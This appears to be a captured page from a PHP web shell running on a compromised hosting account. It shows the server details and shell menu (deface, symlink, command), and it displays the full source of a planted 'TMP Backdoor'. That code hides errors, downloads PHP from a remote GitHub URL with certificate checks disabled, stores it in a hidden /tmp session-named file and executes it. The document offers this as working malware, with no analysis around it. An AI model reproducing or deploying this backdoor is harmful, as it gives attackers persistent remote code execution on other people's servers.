Comming ucUs SH3LL V.2

Path : /home/gujo45me/public_html/
Disable Functions : exec,passthru,shell_exec,system
System : Linux server-604606.appsiete.com 3.10.0-1160.119.1.el7.tuxcare.els25.x86_64 #1 SMP Wed Oct 1 17:37:27 UTC 2025 x86_64

[ Home ][ Zone-h ][ Jumping ][ Symlink ][ Mass Depes ][ Command ]

File Upload :
Current File : /home/gujo45me/public_html/tmpalfa.php

<?php

# 6ickzone TMP Backdoor v2

# Bypass 500 Internal Server Error & Blank Output (WAF Evasion Shell)

# Coded by: 0x6ick - Inspired by L0c4lh34rtz / IndoXploit legacy shell

@ini_set('display_errors', 0);

@set_time_limit(0);

@error_reporting(0);

$payload_url = 'https://raw.githubusercontent.com/ZuanXPloit/Test/refs/heads/master/batosay.php';

$tmp_path = '/tmp/.sess_' . substr(md5($_SERVER['HTTP_HOST']), 0, 10) . '.php';

if (isset($_GET['reload']) || !file_exists($tmp_path) || filesize($tmp_path) == 0) {

    $payload = get_payload($payload_url);

    if (stripos($payload, '<?php') !== false) {

        file_put_contents($tmp_path, $payload);

        usleep(300000);

    }

}

if (file_exists($tmp_path) && filesize($tmp_path) > 0) {

    include_once($tmp_path);

    exit;

}

function get_payload($url) {

    $ctx = stream_context_create(['http' => ['timeout' => 3]]);

    $content = @file_get_contents($url, false, $ctx);

    if (!$content) {

        $ch = curl_init();

        curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);

        curl_setopt($ch, CURLOPT_URL, $url);

        curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);

        curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);

        $content = curl_exec($ch);

        curl_close($ch);

    }

    return $content;

}

?>

Copyright © 2019 | Powered By MecUs7